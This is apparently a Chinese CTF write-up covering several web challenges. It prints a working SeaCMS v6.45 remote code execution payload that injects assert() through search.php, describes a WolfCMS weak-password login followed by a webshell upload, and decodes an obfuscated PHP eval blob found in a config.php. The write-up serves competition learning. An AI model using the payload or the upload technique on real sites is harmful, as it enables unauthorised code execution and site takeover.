#No.8 看视频真嗨皮(读:50分,写:100分)
1 2 3 4
| 提交 关键字词:一档靶标题 =============================================================== 周末看个电影放松一下吧!
|
海洋cms v6.45前台getshell漏洞
payload:
1 2
| url:http://6f781364dedf5dc1eb877079f415877b.xnuca.cn/search.php?searchtype=5&tid=0&year=23334444);assert($_POST[1]);// post:searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=phpinfo();
|
phpinfo()正常执行。
通过system函数执行命令。
找flag位置
查询flag
创建文件
#No.23 找入口(读:100分,写:200分)
1 2 3 4
| 提交 关键字词:二档靶标题 =============================================================== 本站的基本职能是什么
|
找到网站后台,发现后台是弱口令username=admin&password=admin
。
wolfcms 任意文件上传
后台直接上传shell,根据前台的logo找到对应的路径。
按照上一题的套路查看flag,写文件。
第三轮
0x00信息收集
####操作内容
根据提示,访问main.js
,找到作者信息
1 2 3 4 5 6 7
| /* * main.js v1.0 * * 2017/5/20 * author l1Kai@youngin.uu.me * */
|
github找到作者https://github.com/l1Kai/user
获得config.php和flag
1 2 3
| <?php $payload="fVJNc9sgEP1BuUhOPC2HHmxsbJBCDAgkc5NRJCtCHx3HVsivL5aTaZtDDgwDu++93be7Yj2FHbEmU4NpZZ+FYC0UKTP30MUzHR5aGuQpOMfdsjfQDE9jEK3Y0OhUDwefjxsOxRokCuITflk76h7G+GVxfhR4ytUb1ebp3EawWDOrEq5wF0PTRcmJwpZb3dqzFlXH14QxRRPixo645se/GiTgMGkQ5cKciDNfeUUSAMkRIcS9lVnAibSgjGt8ieuHC67/58K2QMwCKRR/5AKfyF1eHe/auoVfeQmTDShFoDSuxzqq+9+e7+x5hyf384K3Ra8zYvHGvmO0FEkIYq6aaucWFFZBlKf7KoKo0xkvDynq8pSW3uNLsVHv2awY964aIhZEz14Tw0XleVoMq6NOw7HYNj1BYMsVm3Km+Nb7Vfsb3s5HvMKroNqnvDGzt6OZHa0Jge9VjRHkJQ+UnHyecEuwYv2E/ajNHrJl8CyqJguXOxl+q8WSkMrvtOS0A1evbxolu+5J/4lf+RnFQsrrG+ANavSWnvYZ9R7S0ntuDfR1BHSXBK+Ei788Hiu4Qoorr/8dNiRIKoWufVzneNMfnM5QmPs5RYjskpCvZdOciQMX05qLmYVH0/F5HNLXfUa8F/OXwwa9Gzcf8+3itqMdteaeDofZvDT33Oezfvr3M9bZcShWp19/AA=="; preg_replace('/.*/e',"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x70\x61\x79\x6c\x6f\x61\x64\x29\x2c\x30\x29\x29\x29",'.'); ?> flag{e76cd8c1-d747-4259-aaac-bc36efe62462}
|
FLAG值
flag{e76cd8c1-d747-4259-aaac-bc36efe62462}
0x01信息分析
操作内容
用python输出\x部分。
eval(base64_decode(gzinflate(base64_decode($payload),0)))
php解密
1 2 3 4
| <?php $payload="fVJNc9sgEP1BuUhOPC2HHmxsbJBCDAgkc5NRJCtCHx3HVsivL5aTaZtDDgwDu++93be7Yj2FHbEmU4NpZZ+FYC0UKTP30MUzHR5aGuQpOMfdsjfQDE9jEK3Y0OhUDwefjxsOxRokCuITflk76h7G+GVxfhR4ytUb1ebp3EawWDOrEq5wF0PTRcmJwpZb3dqzFlXH14QxRRPixo645se/GiTgMGkQ5cKciDNfeUUSAMkRIcS9lVnAibSgjGt8ieuHC67/58K2QMwCKRR/5AKfyF1eHe/auoVfeQmTDShFoDSuxzqq+9+e7+x5hyf384K3Ra8zYvHGvmO0FEkIYq6aaucWFFZBlKf7KoKo0xkvDynq8pSW3uNLsVHv2awY964aIhZEz14Tw0XleVoMq6NOw7HYNj1BYMsVm3Km+Nb7Vfsb3s5HvMKroNqnvDGzt6OZHa0Jge9VjRHkJQ+UnHyecEuwYv2E/ajNHrJl8CyqJguXOxl+q8WSkMrvtOS0A1evbxolu+5J/4lf+RnFQsrrG+ANavSWnvYZ9R7S0ntuDfR1BHSXBK+Ei788Hiu4Qoorr/8dNiRIKoWufVzneNMfnM5QmPs5RYjskpCvZdOciQMX05qLmYVH0/F5HNLXfUa8F/OXwwa9Gzcf8+3itqMdteaeDofZvDT33Oezfvr3M9bZcShWp19/AA=="; echo (base64_decode(gzinflate(base64_decode($payload),0))); ?>
|
得到config.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
| require(__DIR__.'/function.php');
define("DBHOST","127.0.0.1"); define('DBUSER',''); define('DBPASS',''); define('DBNAME',''); define('ROOTDRI',__DIR__."/../"); define("WEB_TITLE",'标题'); define("PRO_KEY","***....");
if (!get_magic_quotes_gpc()) { if (!empty($_GET)) { $_GET = addslashes_deep($_GET); } if (!empty($_POST)) { $_POST = addslashes_deep($_POST); }
$_COOKIE = addslashes_deep($_COOKIE); $_REQUEST = addslashes_deep($_REQUEST); }
require(ROOTDRI.'/org/smarty/Smarty.class.php'); session_start();
exit;
|
查看之前的历史提交,找到最初的config.php,修改php输出执行的内容。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45
| <?php function _rZBFc5($_AXxuMn) { $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $_AXxuMn = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $_AXxuMn); do { $enc1 = strpos($keyStr, substr($_AXxuMn, $i++, 1)); $enc2 = strpos($keyStr, substr($_AXxuMn, $i++, 1)); $enc3 = strpos($keyStr, substr($_AXxuMn, $i++, 1)); $enc4 = strpos($keyStr, substr($_AXxuMn, $i++, 1)); $chr1 = $enc1 << 2 | $enc2 >> 4; $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2; $chr3 = ($enc3 & 3) << 6 | $enc4; $output = $output . chr((int) $chr1); if ($enc3 != 64) { $output = $output . chr((int) $chr2); } if ($enc4 != 64) { $output = $output . chr((int) $chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($_AXxuMn)); return $output; } function _g1S4Ve($_XJwGpK) { return _rZBFc5($_XJwGpK); } function _Xvtafz($_4LYEpc) { return gzinflate($_4LYEpc, 0); } function _ehljDM($_j045Zz) { return eval($_j045Zz); } $_Za0oXi = "fVNNk6IwEP1BcwHU2uWwBw2gCZidhBAgN4zDhwkfVY4y+Os34kzt7hw8pFKp7vde9+uOR/pr2Gzawzbo3m7KwaeNym9kjNh6wjf4jj3aCmDXe4/YERMat/koTmopWlzvd1YVNj8x6JCWGR9km/SZ7foxR2U2LbvIEfahxVaRupeo2/QSyOH3aIUeGZRIxXAw+VBREPsu4wCe4cmf8LQco9P6so/hnCu2vC3SlQ7B0SeaM8phFwHZheyMQUu1aPVFxFVHfUQIxwxNY4cm9eNfDWRRwFSAaSzPaJLfeWNmuQkNEELTR5lZFCXaLaMGXqNmeYXN/1xQHwOi3STmdE9jeEYvRVW/tE0LvvMikii3jC0uYDM2e7Ze7NN8iR3e5E4+iRaujI+OOPkLvOWnnAVaMKSElzdzb5UVFmlehSDoREbLQxp0RYpL4/P1uOW3zDmO+VQNIbHCN6MLwbqCW91CUNUitcfjTvUocHeUkzlnju8Mb2Nu8Dif8Qp6VpWnVEnno5ZOraXtmn75GAJaUosncz0zbuN6pJ+xn7XpQ7ax3uJKZfbmNbGfahFm4+SZVjLvwd3vh0ZJ7rvSf+E9M6coTpL724XbQIkdPucZ7kWGS+O7lsDUYeFXZr0jGv/lMdiY8oBTbvSfYW0UJJwH9z7us3zoD5PIArvIkA4D9Mps6idKXdDkXmUrr9Kxa9nRVWTj9zxDxovVyfylm5xWY7FbP/a0w1ou8HBwVqVcUJNP+q8Zi6wejt751x8="; echo _g1S4Ve(_Xvtafz(_g1S4Ve($_Za0oXi),0))
?>
|
得到flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
|
require(__DIR__.'/function.php');
define("DBHOST","127.0.0.1"); define('DBUSER',''); define('DBPASS',''); define('DBNAME',''); define('ROOTDRI',__DIR__."/../"); define("WEB_TITLE",'标题'); define("PRO_KEY","1071f87ebcf2fb9f96f174eca1ee2dd6");
if (!get_magic_quotes_gpc()) { if (!empty($_GET)) { $_GET = addslashes_deep($_GET); } if (!empty($_POST)) { $_POST = addslashes_deep($_POST); }
$_COOKIE = addslashes_deep($_COOKIE); $_REQUEST = addslashes_deep($_REQUEST); }
require(ROOTDRI.'/org/smarty/Smarty.class.php'); session_start();
exit;
|
FLAG值
flag{9660dc40-0272-44fd-a045-6e6f0f98fca0}
0x02开始渗透
操作内容
github上的项目名为user,访问user目录,提示登陆。
根据登陆页面,用户名是邮箱,根据给出提示猜测密码。
邮箱为github邮箱,密码为likai
,得到flag。
FLAG值
flag{cc498da1-3918-48be-b9e2-c64c69a5349e}